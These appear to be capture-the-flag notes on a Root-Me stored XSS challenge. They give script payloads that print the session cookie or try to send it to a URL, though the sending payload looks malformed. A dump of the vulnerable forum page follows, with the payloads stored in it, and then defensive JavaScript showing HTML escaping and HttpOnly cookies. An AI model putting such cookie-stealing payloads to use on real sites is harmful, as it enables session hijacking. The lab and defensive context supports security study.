Stored XSS 1
<script>alert(document.write(src ="http://challenge01.root-me.org/web-client/ch18/index.php?cookie="+ document.cookie));</script>
<script>alert(document.write(document.cookie));</script>
index:
<html>
<head>
<title>Forum v0.001</title>
</head>
<body><link rel='stylesheet' property='stylesheet' id='s' type='text/css' href='/template/s.css' media='all' /><iframe id='iframe' src='https://www.root-me.org/?page=externe_header'></iframe>
<h1>Forum v0.001</h1>
<hr/>
<span style="text-align: right; float:right;">Status: visitor</span><br/>
<form action="" method="POST" >
<div>
Title:<br/>
<input type="text" name="titre" value="" />
</div><br/>
<div>
Message:<br/>
<textarea name="message" rows="3" cols="50"></textarea>
</div>
<div>
<input type="submit" value="send" />
</div>
</form><br/><br/>
<div>
<div>Posted messages:</div><br/>
<span><b>Welcome</b></span><br/>
<span>N'hésitez pas à me laisser un message / Feel free to leave a message</span><br/><hr/>
<span><b>cookies</b></span><br/><span><script>alert(document.write('cookie: ' + document.cookie));</script></span><br/><hr/>
<span><b>c</b></span><br/><span><script>alert(document.write('cookie: ' + document.cookie));</script></span><br/><hr/>
<span><b>Message read</b></span><br/><span>Vos messages ont bien été lus / Your messages have been read</span><br/><hr/>
</div>
</body>
</html>
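In the dump above, the "cookies" and "c" entries show the forum writing the stored message body into the page unencoded, so the posted `<script>` element is parsed as markup. The following is an added example, not the challenge's own code: it renders the same entry with and without output encoding, and the names `escapeHtml`, `renderUnsafe`, `renderSafe` and `injectedTags` are assumptions.

```javascript
// Constructed sample entries mirroring the "Posted messages" block in the dump.
const posts = [
  { titre: "Welcome", message: "Feel free to leave a message" },
  { titre: "cookies",
    message: "<script>alert(document.write('cookie: ' + document.cookie));</script>" },
];

// Encode the five characters that can change the HTML parsing context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// What the dump shows: stored fields concatenated into the markup as-is.
function renderUnsafe(post) {
  return `<span><b>${post.titre}</b></span><br/><span>${post.message}</span><br/><hr/>`;
}

// Same markup, with both stored fields encoded at output time.
function renderSafe(post) {
  return `<span><b>${escapeHtml(post.titre)}</b></span><br/>` +
         `<span>${escapeHtml(post.message)}</span><br/><hr/>`;
}

// List opening tags in a rendered entry that the template itself does not emit.
// A non-empty result means stored input became markup. This is a check for
// the sample entries here, not a sanitizer or an input filter.
function injectedTags(html) {
  const template = new Set(["span", "b", "br", "hr"]);
  const tags = [...html.matchAll(/<([a-zA-Z][a-zA-Z0-9]*)/g)]
    .map((m) => m[1].toLowerCase());
  return tags.filter((t) => !template.has(t));
}

for (const post of posts) {
  console.log(post.titre, "unsafe:", injectedTags(renderUnsafe(post)),
              "safe:", injectedTags(renderSafe(post)));
}
```

Setting the `HttpOnly` attribute on the session cookie additionally keeps it out of `document.cookie`, which limits what a script that does get through can read.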